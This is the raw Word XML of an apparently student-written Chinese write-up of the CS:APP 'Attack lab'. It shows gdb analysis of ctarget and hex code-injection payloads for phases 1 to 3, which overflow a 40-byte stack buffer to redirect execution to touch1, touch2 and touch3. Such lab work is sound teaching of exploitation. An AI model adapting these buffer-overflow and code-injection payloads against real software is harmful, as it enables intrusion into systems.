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CD4FFF" w14:textId="6451AF7F" w:rsidR="00C85410" w:rsidRDefault="00C85410">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ttack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4AD05" w14:textId="0548F435" w:rsidR="00E144BF" w:rsidRDefault="009E549A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E60644" w14:textId="17A4F753" w:rsidR="009E549A" w:rsidRDefault="009E549A">
      <w:r w:rsidRPr="009E549A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="009E549A">
        <w:t>gdb 调试ctarget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0EE4A" w14:textId="1E827D85" w:rsidR="009E549A" w:rsidRDefault="008F0E3C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D70EC3E" wp14:editId="6023CBE8">
            <wp:extent cx="3764606" cy="1104996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4606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1822" w14:textId="75AFC0FD" w:rsidR="006E6D7D" w:rsidRDefault="006A3260">
      <w:r w:rsidRPr="006A3260">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从第一行</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3260">
        <w:t>sub $0x28, %rsp中显示，在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A3260">
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A3260">
        <w:t>上为buf提供了0x28也就是40个字节的空间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BAD1B" w14:textId="19245708" w:rsidR="00872523" w:rsidRDefault="00872523">
      <w:r w:rsidRPr="00872523">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反汇编</w:t>
      </w:r>
      <w:r w:rsidRPr="00872523">
        <w:t>touch1函数，找到touch1函数的起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B8B46" w14:textId="2FD0ADE2" w:rsidR="00A32538" w:rsidRDefault="006E2F3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5166DA05" wp14:editId="13D825FF">
            <wp:extent cx="5274310" cy="112014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8C24" w14:textId="7F5303A8" w:rsidR="00300A81" w:rsidRDefault="00300A81">
      <w:r w:rsidRPr="00300A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从第一行中看出，</w:t>
      </w:r>
      <w:r w:rsidRPr="00300A81">
        <w:t>touch1的返回地址是0x00000000004017c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC05325" w14:textId="752B770A" w:rsidR="00062F47" w:rsidRDefault="008F19DF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后用缓存区溢出，去填充</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F82B3DE" w14:textId="77A43054" w:rsidR="008F19DF" w:rsidRDefault="00E7672A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建一个txt</w:t>
      </w:r>
      <w:r w:rsidR="000265D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70DEF70E" wp14:editId="00AC0919">
            <wp:extent cx="5274310" cy="18484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3F66" w14:textId="45594031" w:rsidR="00E7672A" w:rsidRDefault="00E7672A">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E7672A">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E7672A">
        <w:t>hex2raw -i 1.txt | ./ctarget -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C007D1B" w14:textId="54F5C5BF" w:rsidR="003D2B55" w:rsidRDefault="000265D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17420D24" wp14:editId="2AF29468">
            <wp:extent cx="5274310" cy="27686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0EF2" w14:textId="41E6CB45" w:rsidR="008D2EA6" w:rsidRDefault="00BA5930">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidR="002951A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（后面开始完全不会（汇编），参照网上教程</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00FC20EA" w:rsidRPr="00B970E5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.jianshu.com/p/db731ca57342?utm_source=oschina-app</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002951A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EEA24" w14:textId="32BCB1BB" w:rsidR="00FC20EA" w:rsidRDefault="009D4749">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于是验证传入数值是否与程序内给定数值相等，所以要将相同的cookie传入</w:t>
      </w:r>
      <w:r w:rsidR="00FD31B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78940C92" wp14:editId="4A3DE334">
            <wp:extent cx="5274310" cy="15817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2C2D" w14:textId="48CE50FF" w:rsidR="001A0399" w:rsidRDefault="00DE4E20">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4451D74B" wp14:editId="5BC6E6F9">
            <wp:extent cx="5274310" cy="141160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2C2A" w14:textId="59C43CEB" w:rsidR="00F06696" w:rsidRDefault="00F06696">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15ABDAD2" wp14:editId="7CF65691">
            <wp:extent cx="5090601" cy="2187130"/>
            <wp:effectExtent l="0" t="0" r="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F02A" w14:textId="2ABE4B70" w:rsidR="00301FEC" w:rsidRDefault="00301FEC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="514A7C52" wp14:editId="31903E8A">
            <wp:extent cx="3535986" cy="2347163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5986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DDB4" w14:textId="7CD811BB" w:rsidR="00381DDC" w:rsidRDefault="00381DDC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到指令序列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D40DB" w14:textId="7044E436" w:rsidR="00381DDC" w:rsidRDefault="00381DDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51A5F0DE" wp14:editId="6616621E">
            <wp:extent cx="2156647" cy="777307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EAED" w14:textId="4DEFB970" w:rsidR="000F00DB" w:rsidRDefault="00463AD0">
      <w:r w:rsidRPr="00463AD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就是寻找</w:t>
      </w:r>
      <w:r w:rsidRPr="00463AD0">
        <w:t>%rsp的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9D43C" w14:textId="033FA06C" w:rsidR="00FE791B" w:rsidRDefault="00FE791B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5EDF5F" wp14:editId="43587D6B">
            <wp:extent cx="5274310" cy="272478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0F4C" w14:textId="6D3447B1" w:rsidR="00701610" w:rsidRDefault="00701610">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43D936" w14:textId="77777777" w:rsidR="00701610" w:rsidRPr="00701610" w:rsidRDefault="00701610" w:rsidP="00701610">
      <w:pPr>
        <w:widowControl/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宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701610">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">48 c7 c7 fa 97 b9 59 68 ec 17 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F0A471" w14:textId="77777777" w:rsidR="00701610" w:rsidRPr="00701610" w:rsidRDefault="00701610" w:rsidP="00701610">
      <w:pPr>
        <w:widowControl/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宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701610">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">40 00 c3 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E142E4" w14:textId="77777777" w:rsidR="00701610" w:rsidRPr="00701610" w:rsidRDefault="00701610" w:rsidP="00701610">
      <w:pPr>
        <w:widowControl/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宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701610">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCFF560" w14:textId="77777777" w:rsidR="00701610" w:rsidRPr="00701610" w:rsidRDefault="00701610" w:rsidP="00701610">
      <w:pPr>
        <w:widowControl/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宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00701610">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0547D4" w14:textId="77777777" w:rsidR="00701610" w:rsidRPr="00701610" w:rsidRDefault="00701610" w:rsidP="00701610">
      <w:pPr>
        <w:widowControl/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701610">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">78 dc 61 55 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B943C" w14:textId="5255F6C8" w:rsidR="00494EE9" w:rsidRDefault="00F028BB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E93BBC" w14:textId="38EC1BDE" w:rsidR="00F028BB" w:rsidRDefault="00582B34">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35330363" wp14:editId="0115B5CD">
            <wp:extent cx="1752752" cy="548688"/>
            <wp:effectExtent l="0" t="0" r="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D570" w14:textId="22F4D7E6" w:rsidR="00582B34" w:rsidRDefault="00582B34">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与二同理得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B577E" w14:textId="01EB9216" w:rsidR="00582B34" w:rsidRDefault="00582B34">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6699615A" wp14:editId="25389E8D">
            <wp:extent cx="1394581" cy="624894"/>
            <wp:effectExtent l="0" t="0" r="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1754" w14:textId="524CA7AE" w:rsidR="004722DC" w:rsidRDefault="004722DC">
      <w:r w:rsidRPr="004722DC">
        <w:t>48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C993B4" w14:textId="3986CB92" w:rsidR="004722DC" w:rsidRDefault="004722DC">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制表示为</w:t>
      </w:r>
      <w:r w:rsidRPr="004722DC">
        <w:t>35 39 62</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004722DC">
        <w:t xml:space="preserve"> 39 39</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004722DC">
        <w:t xml:space="preserve"> 37 66 61 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A50659" w14:textId="08762C9B" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE">
      <w:r>
        <w:t xml:space="preserve">48 c7 c7 a8 dc 61 55 68 fa 18 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899F865" w14:textId="05DB1C7A" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE"/>
    <w:p w14:paraId="41E0295F" w14:textId="77777777" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE"/>
    <w:p w14:paraId="23F15089" w14:textId="77777777" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE">
      <w:r>
        <w:t>40 00 c3 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB6731" w14:textId="77777777" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2B151" w14:textId="77777777" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71796DA1" w14:textId="77777777" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE">
      <w:r>
        <w:t>78 dc 61 55 00 00 00 00 35 39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C72B0" w14:textId="402619E6" w:rsidR="00104FDE" w:rsidRDefault="00104FDE" w:rsidP="00104FDE">
      <w:r>
        <w:t>62 39 39 37 66 61 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC6E6A" w14:textId="6DDD6E4F" w:rsidR="000B2309" w:rsidRPr="00701610" w:rsidRDefault="000B2309" w:rsidP="00104FDE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62DDCE5C" wp14:editId="136C685D">
            <wp:extent cx="5274310" cy="135763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309" w:rsidRPr="007016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018"/>
    <w:rsid w:val="000265D8"/>
    <w:rsid w:val="00062F47"/>
    <w:rsid w:val="000B2309"/>
    <w:rsid w:val="000F00DB"/>
    <w:rsid w:val="00104FDE"/>
    <w:rsid w:val="001A0399"/>
    <w:rsid w:val="001F3E62"/>
    <w:rsid w:val="002951A4"/>
    <w:rsid w:val="00300A81"/>
    <w:rsid w:val="00301FEC"/>
    <w:rsid w:val="00381DDC"/>
    <w:rsid w:val="003D2B55"/>
    <w:rsid w:val="00413449"/>
    <w:rsid w:val="00463AD0"/>
    <w:rsid w:val="004722DC"/>
    <w:rsid w:val="00494EE9"/>
    <w:rsid w:val="00582B34"/>
    <w:rsid w:val="006A3260"/>
    <w:rsid w:val="006E2F3F"/>
    <w:rsid w:val="006E6D7D"/>
    <w:rsid w:val="00701610"/>
    <w:rsid w:val="00872523"/>
    <w:rsid w:val="008D2EA6"/>
    <w:rsid w:val="008F0E3C"/>
    <w:rsid w:val="008F19DF"/>
    <w:rsid w:val="009D4749"/>
    <w:rsid w:val="009E549A"/>
    <w:rsid w:val="00A32538"/>
    <w:rsid w:val="00B44E61"/>
    <w:rsid w:val="00BA5930"/>
    <w:rsid w:val="00C85410"/>
    <w:rsid w:val="00DE4E20"/>
    <w:rsid w:val="00E144BF"/>
    <w:rsid w:val="00E7672A"/>
    <w:rsid w:val="00F028BB"/>
    <w:rsid w:val="00F06696"/>
    <w:rsid w:val="00FC20EA"/>
    <w:rsid w:val="00FD31B1"/>
    <w:rsid w:val="00FD7018"/>
    <w:rsid w:val="00FE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4ACDE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2A889E6-4AD0-4BF6-8B5F-7C6029DFE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C20E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C20EA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70161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01610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70161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2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ianshu.com/p/db731ca57342?utm_source=oschina-app" TargetMode="External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金禾</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>金禾</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-24T09:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-24T10:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>